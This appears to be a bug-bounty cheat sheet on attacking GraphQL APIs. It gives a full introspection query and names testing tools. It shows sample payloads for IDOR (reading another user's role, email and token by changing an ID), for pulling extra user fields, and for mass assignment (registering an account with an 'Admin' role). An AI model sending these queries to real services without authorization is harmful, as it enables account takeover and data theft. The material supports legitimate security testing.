Run the introspection query to map out all methods
Use GraphQL Voyager to display all methods
Use BatchQL or the InQL extension to test all methods for IDORs, SQLi, SSRF, etc
Definition
Query is an operation to retrieve data (read).
Mutation is an operation used to submit and write data (create, update, and delete).
Subscription is an operation used to send data (read) when an event occurs. Subscription is a way for GraphQL clients to listen to live updates from the server.
{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}
query FullIntrospectionQuery {
__schema {
queryType {
name
}
mutationType {
name
}
subscriptionType {
name
}
types {
...FullType
}
directives {
name
description
args {
...InputValue
}
}
}
}
fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
deprecationReason
}
inputFields {
...InputValue
}
interfaces {
...TypeRef
}
enumValues(includeDeprecated: true) {
name
description
isDeprecated
deprecationReason
}
possibleTypes {
...TypeRef
}
}
fragment InputValue on __InputValue {
name
description
type {
...TypeRef
}
defaultValue
}
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
Introspection disabled - Error Messages
IDOR
query {
currentUser(internalId: 1337) {
role
name
email
token
}
}
Change the internalId field
Add extra field
Initial query
query {
listPosts(postId: 13) {
title
description
}
}
Modified query
query {
listPosts(postId: 13) {
title
description
}
user {
username
email
firstName
lastName
}
}
Mass Asignement - mutation
Initial query
mutation {
registerAccount(nickname:"hacker", email:"hacktheplanet@yeswehack.ninja", password:"StrongP@ssword!") {
token {
accessToken
}
user {
email
nickname
role
}
}
}
}
Modified query - role added
mutation {
registerAccount(nickname:"hacker", email:"hacktheplanet@yeswehack.ninja", password:"StrongP@ssword!", role:"Admin") {
token {
accessToken
}
user {
email
nickname
role
}
}
}
}